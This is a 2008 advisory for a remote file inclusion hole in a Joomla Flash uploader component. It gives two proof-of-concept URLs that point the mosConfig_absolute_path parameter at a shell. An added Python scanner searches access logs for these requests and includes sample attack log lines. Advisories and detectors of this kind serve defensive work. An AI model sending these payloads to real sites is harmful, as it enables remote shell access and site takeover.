
JoomlaFlash Component Multiple Remote File Inclusion

 

 



Smasher at ciucciamiilcalzino

Jan 16, 2008, 4:06 PM


Author: Smasher
Site: http://warwolfz.altervista.org
Type: Remote File Inclusion
Risk: High

A remote attacker can gain access to your website through a Remote shell inclusion.

PoC available:

http://sito.it/administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=shell?

http://sito.it/administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=shell?

Regards.
Smasher
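
A defender-side check for the requests described in this post, as an added example that is not part of the original advisory: it scans web-server access logs for requests to the two scripts that carry the `mosConfig_absolute_path` parameter. The Combined Log Format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

# Script paths and parameter name come from the advisory above.
SCRIPTS = (
    "/administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php",
    "/administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php",
)
PARAM = "mosconfig_absolute_path"
# Assumed Combined Log Format: client ... [time] "METHOD target PROTO" status
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "[A-Z]+ (\S+) [^"]*" (\d{3})')
# A value that looks like a URL (scheme://... or //host/...)
URL_RE = re.compile(r"^(?:[a-z][a-z0-9+.\-]*:)?//", re.I)

def classify(line):
    """Return a finding dict if the request sets PARAM on one of SCRIPTS, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    client, target, status = m.groups()
    raw_path, _, raw_query = target.partition("?")
    # Decode and normalise so %-encoding, case and doubled slashes do not hide the path.
    path = re.sub(r"/+", "/", unquote(raw_path)).lower()
    if not path.endswith(SCRIPTS):  # endswith also covers installs in a subdirectory
        return None
    for name, value in parse_qsl(raw_query, keep_blank_values=True):
        if name.lower() == PARAM:  # parse_qsl has already %-decoded name and value
            return {"client": client, "script": path.rsplit("/", 1)[1],
                    "status": int(status), "value": value,
                    "remote": bool(URL_RE.match(value))}
    return None

def scan(lines):
    """Return the findings for every matching line, in input order."""
    return [f for f in map(classify, lines) if f]

BASE = "/administrator/components/com_joomla_flash_uploader/"
# Constructed sample log lines (documentation IP ranges, example.test hosts).
SAMPLE = [
    '192.0.2.10 - - [16/Jan/2008:16:00:01 +0000] "GET /index.php?option=com_content HTTP/1.1" 200 5120',
    '198.51.100.7 - - [16/Jan/2008:16:02:11 +0000] "GET ' + BASE + 'install.joomla_flash_uploader.php?mosConfig_absolute_path=http://files.example.test/x.txt? HTTP/1.1" 200 312',
    '198.51.100.7 - - [16/Jan/2008:16:02:15 +0000] "GET /site' + BASE + 'uninstall.joomla_flash_uploader.php?mosConfig%5Fabsolute%5Fpath=ftp%3A%2F%2Ffiles.example.test%2Fx HTTP/1.0" 404 0',
    '192.0.2.44 - - [16/Jan/2008:16:05:40 +0000] "GET ' + BASE + 'install.joomla_flash_uploader.php HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

A finding with `remote` set and a 200 status is the case to investigate first; a 404 shows the request was made but the script was not found at that path.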
